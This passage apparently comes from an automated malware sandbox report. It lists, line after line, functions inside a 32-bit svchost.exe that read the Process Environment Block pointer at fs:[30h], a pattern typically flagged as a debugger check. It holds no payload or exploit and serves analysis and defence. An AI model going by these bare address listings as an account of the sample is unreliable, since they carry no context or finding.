            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
